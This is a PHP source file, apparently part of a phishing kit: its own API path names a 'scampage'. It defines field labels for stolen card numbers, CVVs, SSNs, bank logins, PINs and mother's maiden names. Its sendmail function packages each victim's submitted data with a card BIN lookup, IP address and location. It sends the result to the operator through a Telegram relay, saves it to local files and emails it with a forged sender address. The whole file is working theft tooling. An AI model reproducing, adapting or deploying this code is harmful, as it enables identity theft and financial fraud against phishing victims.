<?php
trait EPUtility
{
    public $knownName = [
        'pin' => 'PIN',
        'extra' => 'Extra Info',

        // Sub
        'login' => 'Login',
        'card' => 'CC',
        'billing' => 'Billing',
        'bank' => 'Bank',

        'driverlicense' => 'Driver License',

        'payment' => 'Payment',
        'cvv' => 'Card CVV',

        'email' => 'Email',
        'password' => 'Password',

        'securityQuestion' => 'Security Question',

        'dln' => "Driver License Number",
        'mmn' => "Mother Maiden Name",

        'fullAddress' => 'Full Address',

        'userid' => 'User ID',

        'osid' => "OSID Number",
        'creditLimit' => "Credit Limit",
        'ban' => "Bank Access Number",
        'sin' => "Social Insurance Number",
        'civilIdNumber' => "Civil ID Number",
        'idNumber' => "ID Number",
        'sortcode' => "Sort Code",
        'passjp' => 'Pass Japan',

        'information' => 'Information',

        'firstName' => "First Name",
        'lastName' => "Last Name",

        'cardHolder' => "Card Holder",
        'cardNum' => "Card Number",
        'cardExpiry' => 'Card Expiry',
        'cardExpiryMonth' => 'Card Expiry (MM)',
        'cardExpiryYear' => 'Card Expiry (YYYY)',
        'cardCVV' => 'Card CVV',

        'dob' => 'Date Of Birth',

        'fullName' => 'Full Name',
        'addLine' => 'Address Line',
        'addrLine' => 'Address Line',
        'addressLine1' => 'Address Line 1',
        'addressLine2' => 'Address Line 2',
        'city' => 'City',
        'state' => 'State',
        'zipcode' => 'ZIP Code',
        'zipCode' => 'ZIP Code',
        'zip' => 'ZIP Code',

        'phone' => 'Phone',

        'bankName' => 'Bank Name',

        'accountNumber' => 'Account Number',
        'routingNumber' => 'Routing Number',

        'customerId' => 'Customer ID',
        'username' => 'Username',
        'userId' => 'User ID',
        'personalId' => 'Personal ID',
        'accessCode' => 'Access Code',

        'ssn' => 'SSN',
        '4digitSSN' => 'Last 4 Digit SSN',

        'pin' => 'PIN',
        'pinCarrier' => 'PIN Carrier',
    ];
    public function curl($url, $var = '', $useBuildQuery = true, $header = false)
    {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($curl, CURLOPT_USERAGENT, "Wexler (" . (isset($this->configuration['id']) ? $this->configuration['id'] : 'Unknown') . ")");
        if ($header) curl_setopt($curl, CURLOPT_HEADER, true);
        if (!empty($var)) {
            curl_setopt($curl, CURLOPT_POST, true);
            if (is_array($var) && $useBuildQuery) {
                curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($var));
            } else {
                curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
            }
        }
        if (strpos($url, 'wexler.club') !== false) curl_setopt($curl, CURLOPT_HTTPHEADER, [
            'api-key: ' . (isset($this->configuration['apikey']) ? $this->configuration['apikey'] : 'Unknown'),
            'page-id: ' . (isset($this->configuration['pageid']) ? $this->configuration['pageid'] : 'Unknown')
        ]);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    }
    public function RandUnik($panjang = 1, $metadata = "ABCDEFGHIJKLMNOPQRESTUVWXYZ012345679")
    {
        $pstring = $metadata;
        $plen    = strlen($pstring);
        $unik = '';
        for ($i = 1; $i <= ($panjang + 5); $i++) {
            $start = rand(0, $plen);
            $unik .= substr($pstring, $start, 1);
        }
        return substr($unik, 0, $panjang);
    }
    public function sendmail($s, $b, $img = [], $opt = [])
    {
        $bin = [];
        $tmpBody = '';

        if (is_string($b)) {
            $tmpBody = $b;
        } else {
            // Some Shit
            if ($b['type'] == "card") {
                if (isset($b['cardNum'])) {
                    $tmpBIN = $this->binGetData(str_replace(' ', '', $b['cardNum']));

                    $binNum = substr(trim(str_replace(' ', '', $b['cardNum'])), 0, 6);
                    if (!empty($binNum)) {
                        $bin[] = $binNum;
                    }
                    if (isset($tmpBIN['type'])) {
                        $bin[] = strtoupper($tmpBIN['type']);
                    }
                    if (isset($tmpBIN['brand'])) {
                        $bin[] = strtoupper($tmpBIN['brand']);
                    }
                    if (isset($tmpBIN['bank']['name'])) {
                        $bin[] = $tmpBIN['bank']['name'];
                    }
                    if (isset($tmpBIN['country']['name'])) {
                        $bin[] = $tmpBIN['country']['name'];
                    }
                    $tmpBody .= '<br/><b>Data:</b>&nbsp;' . $b['cardNum'] . '|' . $b['cardExpiry'] . '|' . $b['cardCVV'] . '<br/>';
                }
            }

            // Remove Some Shit;
            unset($b['type']);

            // Body
            $tmpBody = '';
            foreach ($b as $key => $value) {
                $tmpBody .= "<b>" . (isset($this->knownName[$key]) ? $this->knownName[$key] : $key) . "</b>:&nbsp;" . htmlentities($value, ENT_QUOTES) . "<br/>";
            }
            if (empty($b)) $tmpBody .= '<i>No Information Added</i>';

            $tmpBody .= '<br/><br/>PC Info:<br/>'
                . ('<b>Domain:</b>&nbsp;' . str_replace(["."], "(.)", (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'n/a')))
                . ('<br/><b>Useragent:</b>&nbsp;' . $_SERVER['HTTP_USER_AGENT'])
                . ('<br/><b>IP Address:</b>&nbsp;' . $this->ipGetAddress())
                . ('<br/><b>IP Country:</b>&nbsp;' . (isset($this->ip['country']['name']) ? $this->ip['country']['name'] : 'n/a'))
                . ('<br/><b>IP City:</b>&nbsp;' . (isset($this->ip['city']) ? $this->ip['city'] : 'n/a'))
                . ('<br/><b>IP State:</b>&nbsp;' . (isset($this->ip['state']) ? $this->ip['state'] : 'n/a'))
                . ('<br/><b>IP ISP:</b>&nbsp;' . (isset($this->ip['isp']) ? $this->ip['isp'] : 'n/a'))
                . ('<br/><b>IP Timezone:</b>&nbsp;' . (isset($this->ip['timezone']['name']) ? $this->ip['timezone']['name'] : 'n/a'))
                . ('<br/><b>Session ID:</b>&nbsp;' . $this->sessionGetID());
        }

        // Subject
        if (defined('RESEND_RESULT')) {
            $subject = ($s . " [ RESEND RESULT ]"  . (empty($bin) ? '' : (' [' . implode(' - ', $bin) . ']')) . " [ " . (isset($this->configuration['id']) ? $this->configuration['id'] : 'n/a') . " ]");
        } else {
            $subject = ($s . " [ " . (isset($this->ip['country']['code2']) ? $this->ip['country']['code2'] : 'n/a') . " - " . $this->ipGetAddress() . " ]"  . (empty($bin) ? '' : (' [' . implode(' - ', $bin) . ']')) . " [ " . (isset($this->configuration['id']) ? $this->configuration['id'] : 'n/a') . " ]");
        }
        try {
            $useTelegram = $this->configurationGetProps()['telegramConsent'];
            if ($useTelegram) {
                $posdata = [
                    'subject' => $subject,
                    'message' => $tmpBody,
                ];

                if (!empty($img)) {
                    foreach ($img as $index => $file) {
                        $postData['file[' . $index . ']'] = curl_file_create(
                            realpath($file),
                            mime_content_type($file),
                            basename($file)
                        );
                    }
                }

                $data = $this->apiGet('/scampage/_/telegram/send', $posdata, false);
                if (isset($data['status'])) {
                    if (!$data['status']) {
                        $this->logMessage(isset($data['message']) ? $data['message'] : "Unable to send result with unknown reason.");
                    }
                } else {
                    $this->logMessage("Unable to send result caused by unable connect to Scampage.");
                }
            }
        } catch (Exception $e) {
            $this->logMessage("[UNKNOWN] Error While Sending: " . $e->getMessage());
        }

        $useTelegram = $this->configurationGetProps()['saveToLocalResult'];
        if ($useTelegram) {
            $path = dirname(__FILE__) . '/../../.wexler/result';
            if (!file_exists($path)) @mkdir($path, 0755, true);

            $filename = $subject . '.txt';
            file_put_contents($path . '/' . $filename, strip_tags(str_replace(["<br/>", "&nbsp;"], ["\n", " "], ($subject . "\r\n\r\n" . $tmpBody))));
        }

        /**
         * No Email? Okay.
         */
        if (empty($this->configurationGetProps()['email'])) return;

        $mail = new PHPMailer(true);
        try {
            $useSmtp = $this->configurationGetProps()['smtpEnable'];
            if ($useSmtp) {
                $mail->isSMTP();
                $mail->SMTPAuth = true;
                $mail->Host = $this->configurationGetProps()['smtpHost'];
                $mail->Port = $this->configurationGetProps()['smtpPort'];
                $mail->Username = $this->configurationGetProps()['smtpUser'];
                $mail->Password = $this->configurationGetProps()['smtpPassword'];
                $mail->SMTPSecure = $this->configurationGetProps()['smtpSecure'] ? 'ssl' : 'tls';

                //
                $fromName = $this->configurationGetProps()['sender_from_name'];
                if (empty($fromName)) $fromName = $this->configurationGetProps()['smtpUser'];

                $mail->setFrom($this->configurationGetProps()['smtpUser'], isset($opt['from']) ? (!empty($opt['from']) ? $opt['from'] : $fromName) : $fromName);
            } else {
                $mail->isMail();

                //
                $fromEmail = $this->configurationGetProps()['sender_from_email'];
                if (empty($fromEmail)) $fromEmail = $this->RandUnik(20) . '@thehightable.club';

                //
                $fromName = $this->configurationGetProps()['sender_from_name'];
                if (empty($fromName)) $fromName = 'The High Table';

                //
                $mail->setFrom($fromEmail, isset($opt['from']) ? (!empty($opt['from']) ? $opt['from'] : $fromName) : $fromName);
            }

            $mail->isHTML(true);
            $mail->CharSet = "UTF-8";
            if (!empty($img)) {
                foreach ($img as $key => $value) {
                    $mail->AddAttachment($value);
                }
            }

            $mail->Subject = $subject;
            $mail->Body = $tmpBody;
            $mail->addAddress($this->configurationGetProps()['email']);
            $mail->send();

            // } catch (phpmailerException $e) {
            //     $this->logMessage("[PHPMAILER] Error While Sending: " . $e->errorMessage());

        } catch (Exception $e) {
            $this->logMessage("[UNKNOWN] Error While Sending: " . $e->getMessage());
        }
    }
    public function copyr($source, $dest)
    {
        if (is_dir($source)) {
            $dir_handle = opendir($source);
            $sourcefolder = basename($source);
            mkdir($dest . "/" . $sourcefolder);
            while ($file = readdir($dir_handle)) {
                if ($file != "." && $file != "..") {
                    if (is_dir($source . "/" . $file)) {
                        $this->copyr($source . "/" . $file, $dest . "/" . $sourcefolder);
                    } else {
                        copy($source . "/" . $file, $dest . "/" . $file);
                    }
                }
            }
            closedir($dir_handle);
        } else {
            copy($source, $dest);
        }
    }
}
